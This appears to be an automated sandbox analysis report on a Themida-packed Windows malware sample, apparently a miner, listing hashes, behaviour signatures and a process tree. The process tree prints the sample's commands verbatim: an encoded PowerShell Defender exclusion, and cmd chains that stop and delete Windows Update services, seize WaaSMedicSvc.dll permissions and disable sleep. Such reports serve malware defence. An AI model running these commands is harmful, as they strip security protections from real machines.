Analysis
-
max time kernel
300s -
max time network
297s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
24-10-2022 15:59
Behavioral task
behavioral1
Sample
2.exe
Resource
win7-20220812-en
General
-
Target
2.exe
-
Size
7.4MB
-
MD5
8ddc35d10e70c08abd8a15a787d3b586
-
SHA1
08219f2e68c5e72a7d218d63cea15bf8db5aff6c
-
SHA256
057e1aaca82b095ce425737bb5108155c8717868276e68a9fa93084850d2a585
-
SHA512
99046db0247aebc545daf5e5380a28edec47dffe0b9d036d504bff8616c7c39d2deaa088dac8fe779e497d9b060c76bcb423600426faa70e9ac896de342ed79a
-
SSDEEP
196608:qs7RTqMym+7SHwnuyFAHqEs4ezo22zS9nln606:T7Y11nu+cso2PlnQ
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
2.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2.exe -
Drops file in Drivers directory 1 IoCs
Processes:
conhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 1 IoCs
Processes:
explorer.exepid process 4352 explorer.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 4812 takeown.exe 2216 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
2.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 4812 takeown.exe 2216 icacls.exe -
Processes:
resource yara_rule behavioral2/memory/4960-132-0x0000000000400000-0x00000000010DC000-memory.dmp themida behavioral2/memory/4960-133-0x0000000000400000-0x00000000010DC000-memory.dmp themida behavioral2/memory/4960-135-0x0000000000400000-0x00000000010DC000-memory.dmp themida behavioral2/memory/4960-136-0x0000000000400000-0x00000000010DC000-memory.dmp themida -
Processes:
2.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
2.exepid process 4960 2.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 3452 set thread context of 4352 3452 conhost.exe explorer.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 2356 sc.exe 3120 sc.exe 3036 sc.exe 1088 sc.exe 4640 sc.exe -
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 2840 reg.exe 4004 reg.exe 4168 reg.exe 3092 reg.exe 2432 reg.exe 1296 reg.exe 3580 reg.exe 1868 reg.exe 4604 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeexplorer.exepid process 2024 powershell.exe 2024 powershell.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe 4352 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 660 -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeexplorer.exedescription pid process Token: SeDebugPrivilege 2024 powershell.exe Token: SeShutdownPrivilege 2384 powercfg.exe Token: SeCreatePagefilePrivilege 2384 powercfg.exe Token: SeShutdownPrivilege 3524 powercfg.exe Token: SeCreatePagefilePrivilege 3524 powercfg.exe Token: SeShutdownPrivilege 3688 powercfg.exe Token: SeCreatePagefilePrivilege 3688 powercfg.exe Token: SeShutdownPrivilege 4436 powercfg.exe Token: SeCreatePagefilePrivilege 4436 powercfg.exe Token: SeTakeOwnershipPrivilege 4812 takeown.exe Token: SeLockMemoryPrivilege 4352 explorer.exe Token: SeLockMemoryPrivilege 4352 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2.execonhost.execmd.execmd.exedescription pid process target process PID 4960 wrote to memory of 3452 4960 2.exe conhost.exe PID 4960 wrote to memory of 3452 4960 2.exe conhost.exe PID 4960 wrote to memory of 3452 4960 2.exe conhost.exe PID 3452 wrote to memory of 2024 3452 conhost.exe powershell.exe PID 3452 wrote to memory of 2024 3452 conhost.exe powershell.exe PID 3452 wrote to memory of 4532 3452 conhost.exe cmd.exe PID 3452 wrote to memory of 4532 3452 conhost.exe cmd.exe PID 3452 wrote to memory of 2868 3452 conhost.exe cmd.exe PID 3452 wrote to memory of 2868 3452 conhost.exe cmd.exe PID 4532 wrote to memory of 2356 4532 cmd.exe sc.exe PID 4532 wrote to memory of 2356 4532 cmd.exe sc.exe PID 2868 wrote to memory of 2384 2868 cmd.exe powercfg.exe PID 2868 wrote to memory of 2384 2868 cmd.exe powercfg.exe PID 4532 wrote to memory of 3120 4532 cmd.exe sc.exe PID 4532 wrote to memory of 3120 4532 cmd.exe sc.exe PID 2868 wrote to memory of 3524 2868 cmd.exe powercfg.exe PID 2868 wrote to memory of 3524 2868 cmd.exe powercfg.exe PID 4532 wrote to memory of 3036 4532 cmd.exe sc.exe PID 4532 wrote to memory of 3036 4532 cmd.exe sc.exe PID 2868 wrote to memory of 3688 2868 cmd.exe powercfg.exe PID 2868 wrote to memory of 3688 2868 cmd.exe powercfg.exe PID 4532 wrote to memory of 1088 4532 cmd.exe sc.exe PID 4532 wrote to memory of 1088 4532 cmd.exe sc.exe PID 2868 wrote to memory of 4436 2868 cmd.exe powercfg.exe PID 2868 wrote to memory of 4436 2868 cmd.exe powercfg.exe PID 4532 wrote to memory of 4640 4532 cmd.exe sc.exe PID 4532 wrote to memory of 4640 4532 cmd.exe sc.exe PID 4532 wrote to memory of 3092 4532 cmd.exe reg.exe PID 4532 wrote to memory of 3092 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2840 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2840 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4004 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4004 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2432 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2432 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1296 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1296 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4812 4532 cmd.exe takeown.exe PID 4532 wrote to memory of 4812 4532 cmd.exe takeown.exe PID 4532 wrote to memory of 2216 4532 cmd.exe icacls.exe PID 4532 wrote to memory of 2216 4532 cmd.exe icacls.exe PID 3452 wrote to memory of 4352 3452 conhost.exe explorer.exe PID 3452 wrote to memory of 4352 3452 conhost.exe explorer.exe PID 3452 wrote to memory of 4352 3452 conhost.exe explorer.exe PID 4532 wrote to memory of 3580 4532 cmd.exe reg.exe PID 4532 wrote to memory of 3580 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4168 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4168 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1868 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1868 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4604 4532 cmd.exe reg.exe PID 4532 wrote to memory of 4604 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1136 4532 cmd.exe schtasks.exe PID 4532 wrote to memory of 1136 4532 cmd.exe schtasks.exe PID 4532 wrote to memory of 4560 4532 cmd.exe schtasks.exe PID 4532 wrote to memory of 4560 4532 cmd.exe schtasks.exe PID 4532 wrote to memory of 4276 4532 cmd.exe schtasks.exe PID 4532 wrote to memory of 4276 4532 cmd.exe schtasks.exe PID 4532 wrote to memory of 532 4532 cmd.exe schtasks.exe PID 4532 wrote to memory of 532 4532 cmd.exe schtasks.exe PID 4532 wrote to memory of 1456 4532 cmd.exe schtasks.exe PID 4532 wrote to memory of 1456 4532 cmd.exe schtasks.exe PID 4532 wrote to memory of 4756 4532 cmd.exe schtasks.exe PID 4532 wrote to memory of 4756 4532 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\2.exe"2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbwBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGsAdgBwAHEAIwA+ACAAQAAoACAAPAAjAHIAdgBhACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwB0AHUAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAdQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG8AaQAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeC:\Windows\explorer.exe aanewtbrhdbz1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/kRRORiyYEXQjlDWVnkLqznS8gWE6k3nXSMLi6nDwXFvazQSyw8+toWHTrnijZtUQ24/815/zhCZs1iAzqCrMGLeWXdJqAzh1OZvKAkAlE5F0/M1ZedWuCT9hZ79EApH/3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
\Users\Admin\AppData\Roaming\2BF.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/532-174-0x0000000000000000-mapping.dmp
-
memory/1088-152-0x0000000000000000-mapping.dmp
-
memory/1136-171-0x0000000000000000-mapping.dmp
-
memory/1296-160-0x0000000000000000-mapping.dmp
-
memory/1456-175-0x0000000000000000-mapping.dmp
-
memory/1868-169-0x0000000000000000-mapping.dmp
-
memory/2024-142-0x00007FFBC8560000-0x00007FFBC9021000-memory.dmpFilesize
10.8MB
-
memory/2024-140-0x0000000000000000-mapping.dmp
-
memory/2024-141-0x0000018EEA130000-0x0000018EEA152000-memory.dmpFilesize
136KB
-
memory/2024-143-0x00007FFBC8560000-0x00007FFBC9021000-memory.dmpFilesize
10.8MB
-
memory/2216-162-0x0000000000000000-mapping.dmp
-
memory/2264-177-0x0000000000000000-mapping.dmp
-
memory/2356-146-0x0000000000000000-mapping.dmp
-
memory/2384-147-0x0000000000000000-mapping.dmp
-
memory/2432-159-0x0000000000000000-mapping.dmp
-
memory/2840-157-0x0000000000000000-mapping.dmp
-
memory/2868-145-0x0000000000000000-mapping.dmp
-
memory/3036-150-0x0000000000000000-mapping.dmp
-
memory/3092-156-0x0000000000000000-mapping.dmp
-
memory/3120-148-0x0000000000000000-mapping.dmp
-
memory/3452-139-0x00007FFBC8560000-0x00007FFBC9021000-memory.dmpFilesize
10.8MB
-
memory/3452-155-0x0000019731860000-0x0000019731872000-memory.dmpFilesize
72KB
-
memory/3452-138-0x0000019716A40000-0x0000019716E6B000-memory.dmpFilesize
4.2MB
-
memory/3452-166-0x00007FFBC8560000-0x00007FFBC9021000-memory.dmpFilesize
10.8MB
-
memory/3524-149-0x0000000000000000-mapping.dmp
-
memory/3580-167-0x0000000000000000-mapping.dmp
-
memory/3688-151-0x0000000000000000-mapping.dmp
-
memory/4004-158-0x0000000000000000-mapping.dmp
-
memory/4168-168-0x0000000000000000-mapping.dmp
-
memory/4276-173-0x0000000000000000-mapping.dmp
-
memory/4352-165-0x0000000001FB0000-0x0000000001FD0000-memory.dmpFilesize
128KB
-
memory/4352-164-0x00007FF61C2EE514-mapping.dmp
-
memory/4436-153-0x0000000000000000-mapping.dmp
-
memory/4532-144-0x0000000000000000-mapping.dmp
-
memory/4560-172-0x0000000000000000-mapping.dmp
-
memory/4604-170-0x0000000000000000-mapping.dmp
-
memory/4640-154-0x0000000000000000-mapping.dmp
-
memory/4756-176-0x0000000000000000-mapping.dmp
-
memory/4812-161-0x0000000000000000-mapping.dmp
-
memory/4960-137-0x00007FFBE72D0000-0x00007FFBE74C5000-memory.dmpFilesize
2.0MB
-
memory/4960-132-0x0000000000400000-0x00000000010DC000-memory.dmpFilesize
12.9MB
-
memory/4960-136-0x0000000000400000-0x00000000010DC000-memory.dmpFilesize
12.9MB
-
memory/4960-135-0x0000000000400000-0x00000000010DC000-memory.dmpFilesize
12.9MB
-
memory/4960-134-0x00007FFBE72D0000-0x00007FFBE74C5000-memory.dmpFilesize
2.0MB
-
memory/4960-133-0x0000000000400000-0x00000000010DC000-memory.dmpFilesize
12.9MB